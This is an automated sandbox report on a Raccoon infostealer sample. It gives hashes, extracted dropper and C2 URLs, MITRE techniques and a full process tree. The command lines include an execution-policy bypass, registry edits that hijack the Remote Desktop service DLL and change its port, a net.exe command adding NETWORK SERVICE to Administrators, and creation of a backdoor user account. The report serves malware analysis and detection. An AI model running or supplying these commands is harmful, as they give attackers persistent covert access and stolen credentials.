raccoon | 399b61ce97c4bed90c614e0be359f107b8c75293baa720ccdc5209e7130ef874

Analysis

max time kernel
73s
max time network
110s
platform
windows10_x64
resource
win10v20210410
submitted
02-06-2021 17:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5676da3b40d61806be97f0826797e3bc.exe
Size

568KB
MD5

5676da3b40d61806be97f0826797e3bc
SHA1

44333f38e11d577289c5bcd2fbf6679431b897a2
SHA256

399b61ce97c4bed90c614e0be359f107b8c75293baa720ccdc5209e7130ef874
SHA512

e70ee7b00ad641166776f8c29280c51b13ff89e85da9316637158208fc91334379befed616980cf33aa2e803b8edcdaec883864d8e83f9991329325911b303ce

Score

10^/10

raccoon e46634757936706c1ff491585768dd6fe231db30 discovery persistence spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

raccoon

Botnet

e46634757936706c1ff491585768dd6fe231db30

Attributes

url4cnc
https://tttttt.me/jdiamond13

rc4.plain

Signatures

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

flow	pid	Process
29	3188	powershell.exe
31	3188	powershell.exe
32	3188	powershell.exe
33	3188	powershell.exe
35	3188	powershell.exe
37	3188	powershell.exe
39	3188	powershell.exe
41	3188	powershell.exe
43	3188	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
3724	3e0KxzRe2J.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000900000000068b-237.dat	upx
behavioral2/files/0x000a000000000695-238.dat	upx

Loads dropped DLL 8 IoCs

pid	Process
780	5676da3b40d61806be97f0826797e3bc.exe
780	5676da3b40d61806be97f0826797e3bc.exe
780	5676da3b40d61806be97f0826797e3bc.exe
780	5676da3b40d61806be97f0826797e3bc.exe
780	5676da3b40d61806be97f0826797e3bc.exe
780	5676da3b40d61806be97f0826797e3bc.exe
2460	Process not Found
2460	Process not Found

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe

Drops file in Windows directory 19 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBB86.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBBA8.tmp	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_fgocpqlr.tcc.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBBB8.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_lfsru0c3.3oz.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBB66.tmp	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBB97.tmp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1792	timeout.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 339704ea112ed701	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4052	reg.exe

Runs net.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	33	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	35	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	31	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	32	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
432	powershell.exe
432	powershell.exe
432	powershell.exe
3332	powershell.exe
3332	powershell.exe
3332	powershell.exe
3276	powershell.exe
3276	powershell.exe
3276	powershell.exe
3848	powershell.exe
3848	powershell.exe
3848	powershell.exe
432	powershell.exe
432	powershell.exe
432	powershell.exe
3188	powershell.exe
3188	powershell.exe
3188	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
632	Process not Found
632	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	432	powershell.exe
Token: SeDebugPrivilege	3332	powershell.exe
Token: SeIncreaseQuotaPrivilege	3332	powershell.exe
Token: SeSecurityPrivilege	3332	powershell.exe
Token: SeTakeOwnershipPrivilege	3332	powershell.exe
Token: SeLoadDriverPrivilege	3332	powershell.exe
Token: SeSystemProfilePrivilege	3332	powershell.exe
Token: SeSystemtimePrivilege	3332	powershell.exe
Token: SeProfSingleProcessPrivilege	3332	powershell.exe
Token: SeIncBasePriorityPrivilege	3332	powershell.exe
Token: SeCreatePagefilePrivilege	3332	powershell.exe
Token: SeBackupPrivilege	3332	powershell.exe
Token: SeRestorePrivilege	3332	powershell.exe
Token: SeShutdownPrivilege	3332	powershell.exe
Token: SeDebugPrivilege	3332	powershell.exe
Token: SeSystemEnvironmentPrivilege	3332	powershell.exe
Token: SeRemoteShutdownPrivilege	3332	powershell.exe
Token: SeUndockPrivilege	3332	powershell.exe
Token: SeManageVolumePrivilege	3332	powershell.exe
Token: 33	3332	powershell.exe
Token: 34	3332	powershell.exe
Token: 35	3332	powershell.exe
Token: 36	3332	powershell.exe
Token: SeDebugPrivilege	3276	powershell.exe
Token: SeIncreaseQuotaPrivilege	3276	powershell.exe
Token: SeSecurityPrivilege	3276	powershell.exe
Token: SeTakeOwnershipPrivilege	3276	powershell.exe
Token: SeLoadDriverPrivilege	3276	powershell.exe
Token: SeSystemProfilePrivilege	3276	powershell.exe
Token: SeSystemtimePrivilege	3276	powershell.exe
Token: SeProfSingleProcessPrivilege	3276	powershell.exe
Token: SeIncBasePriorityPrivilege	3276	powershell.exe
Token: SeCreatePagefilePrivilege	3276	powershell.exe
Token: SeBackupPrivilege	3276	powershell.exe
Token: SeRestorePrivilege	3276	powershell.exe
Token: SeShutdownPrivilege	3276	powershell.exe
Token: SeDebugPrivilege	3276	powershell.exe
Token: SeSystemEnvironmentPrivilege	3276	powershell.exe
Token: SeRemoteShutdownPrivilege	3276	powershell.exe
Token: SeUndockPrivilege	3276	powershell.exe
Token: SeManageVolumePrivilege	3276	powershell.exe
Token: 33	3276	powershell.exe
Token: 34	3276	powershell.exe
Token: 35	3276	powershell.exe
Token: 36	3276	powershell.exe
Token: SeDebugPrivilege	3848	powershell.exe
Token: SeIncreaseQuotaPrivilege	3848	powershell.exe
Token: SeSecurityPrivilege	3848	powershell.exe
Token: SeTakeOwnershipPrivilege	3848	powershell.exe
Token: SeLoadDriverPrivilege	3848	powershell.exe
Token: SeSystemProfilePrivilege	3848	powershell.exe
Token: SeSystemtimePrivilege	3848	powershell.exe
Token: SeProfSingleProcessPrivilege	3848	powershell.exe
Token: SeIncBasePriorityPrivilege	3848	powershell.exe
Token: SeCreatePagefilePrivilege	3848	powershell.exe
Token: SeBackupPrivilege	3848	powershell.exe
Token: SeRestorePrivilege	3848	powershell.exe
Token: SeShutdownPrivilege	3848	powershell.exe
Token: SeDebugPrivilege	3848	powershell.exe
Token: SeSystemEnvironmentPrivilege	3848	powershell.exe
Token: SeRemoteShutdownPrivilege	3848	powershell.exe
Token: SeUndockPrivilege	3848	powershell.exe
Token: SeManageVolumePrivilege	3848	powershell.exe
Token: 33	3848	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 780 wrote to memory of 3724	780	5676da3b40d61806be97f0826797e3bc.exe	79
PID 780 wrote to memory of 3724	780	5676da3b40d61806be97f0826797e3bc.exe	79
PID 780 wrote to memory of 2084	780	5676da3b40d61806be97f0826797e3bc.exe	80
PID 780 wrote to memory of 2084	780	5676da3b40d61806be97f0826797e3bc.exe	80
PID 780 wrote to memory of 2084	780	5676da3b40d61806be97f0826797e3bc.exe	80
PID 2084 wrote to memory of 1792	2084	cmd.exe	82
PID 2084 wrote to memory of 1792	2084	cmd.exe	82
PID 2084 wrote to memory of 1792	2084	cmd.exe	82
PID 3724 wrote to memory of 432	3724	3e0KxzRe2J.exe	83
PID 3724 wrote to memory of 432	3724	3e0KxzRe2J.exe	83
PID 432 wrote to memory of 3236	432	powershell.exe	85
PID 432 wrote to memory of 3236	432	powershell.exe	85
PID 3236 wrote to memory of 3636	3236	csc.exe	86
PID 3236 wrote to memory of 3636	3236	csc.exe	86
PID 432 wrote to memory of 3332	432	powershell.exe	87
PID 432 wrote to memory of 3332	432	powershell.exe	87
PID 432 wrote to memory of 3276	432	powershell.exe	90
PID 432 wrote to memory of 3276	432	powershell.exe	90
PID 432 wrote to memory of 3848	432	powershell.exe	92
PID 432 wrote to memory of 3848	432	powershell.exe	92
PID 432 wrote to memory of 1196	432	powershell.exe	95
PID 432 wrote to memory of 1196	432	powershell.exe	95
PID 432 wrote to memory of 4052	432	powershell.exe	96
PID 432 wrote to memory of 4052	432	powershell.exe	96
PID 432 wrote to memory of 1808	432	powershell.exe	97
PID 432 wrote to memory of 1808	432	powershell.exe	97
PID 432 wrote to memory of 1356	432	powershell.exe	98
PID 432 wrote to memory of 1356	432	powershell.exe	98
PID 1356 wrote to memory of 648	1356	net.exe	99
PID 1356 wrote to memory of 648	1356	net.exe	99
PID 432 wrote to memory of 3476	432	powershell.exe	100
PID 432 wrote to memory of 3476	432	powershell.exe	100
PID 3476 wrote to memory of 2364	3476	cmd.exe	101
PID 3476 wrote to memory of 2364	3476	cmd.exe	101
PID 2364 wrote to memory of 428	2364	cmd.exe	102
PID 2364 wrote to memory of 428	2364	cmd.exe	102
PID 428 wrote to memory of 2712	428	net.exe	103
PID 428 wrote to memory of 2712	428	net.exe	103
PID 432 wrote to memory of 1540	432	powershell.exe	104
PID 432 wrote to memory of 1540	432	powershell.exe	104
PID 1540 wrote to memory of 2212	1540	cmd.exe	105
PID 1540 wrote to memory of 2212	1540	cmd.exe	105
PID 2212 wrote to memory of 1104	2212	cmd.exe	106
PID 2212 wrote to memory of 1104	2212	cmd.exe	106
PID 1104 wrote to memory of 2280	1104	net.exe	107
PID 1104 wrote to memory of 2280	1104	net.exe	107
PID 3380 wrote to memory of 3332	3380	cmd.exe	111
PID 3380 wrote to memory of 3332	3380	cmd.exe	111
PID 3332 wrote to memory of 2876	3332	net.exe	112
PID 3332 wrote to memory of 2876	3332	net.exe	112
PID 1500 wrote to memory of 596	1500	cmd.exe	115
PID 1500 wrote to memory of 596	1500	cmd.exe	115
PID 596 wrote to memory of 864	596	net.exe	116
PID 596 wrote to memory of 864	596	net.exe	116
PID 504 wrote to memory of 3444	504	cmd.exe	119
PID 504 wrote to memory of 3444	504	cmd.exe	119
PID 3444 wrote to memory of 648	3444	net.exe	120
PID 3444 wrote to memory of 648	3444	net.exe	120
PID 1196 wrote to memory of 4020	1196	cmd.exe	123
PID 1196 wrote to memory of 4020	1196	cmd.exe	123
PID 4020 wrote to memory of 3188	4020	net.exe	124
PID 4020 wrote to memory of 3188	4020	net.exe	124
PID 1356 wrote to memory of 380	1356	cmd.exe	127
PID 1356 wrote to memory of 380	1356	cmd.exe	127

C:\Users\Admin\AppData\Local\Temp\5676da3b40d61806be97f0826797e3bc.exe
"C:\Users\Admin\AppData\Local\Temp\5676da3b40d61806be97f0826797e3bc.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:780
- C:\Users\Admin\AppData\Local\Temp\3e0KxzRe2J.exe
  "C:\Users\Admin\AppData\Local\Temp\3e0KxzRe2J.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3724
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    3⤵
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:432
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jcpf0icw\jcpf0icw.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3236
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D15.tmp" "c:\Users\Admin\AppData\Local\Temp\jcpf0icw\CSC417307C154404E3D9A7B3FED1D5D2D5.TMP"
        5⤵
        
        PID:3636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3332
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3276
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3848
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
      4⤵
      PID:1196
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      4⤵
      Modifies registry key
      PID:4052
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
      4⤵
      PID:1808
  - - C:\Windows\system32\net.exe
      "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1356
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        5⤵
        
        PID:648
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3476
    - - C:\Windows\system32\cmd.exe
        
        cmd /c net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2364
      - C:\Windows\system32\net.exe
        
        net start rdpdr
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:428
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        7⤵
        
        PID:2712
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1540
    - - C:\Windows\system32\cmd.exe
        
        cmd /c net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2212
      - C:\Windows\system32\net.exe
        
        net start TermService
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1104
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        7⤵
        
        PID:2280
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
      4⤵
      PID:3944
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
      4⤵
      PID:1808
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\5676da3b40d61806be97f0826797e3bc.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2084
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:1792

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:3380
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Ghar4f5 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3332
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
    3⤵
    PID:2876

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc VuCbWcxs /add
1⤵
- Suspicious use of WriteProcessMemory
PID:1500
- C:\Windows\system32\net.exe
  net.exe user wgautilacc VuCbWcxs /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:596
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc VuCbWcxs /add
    3⤵
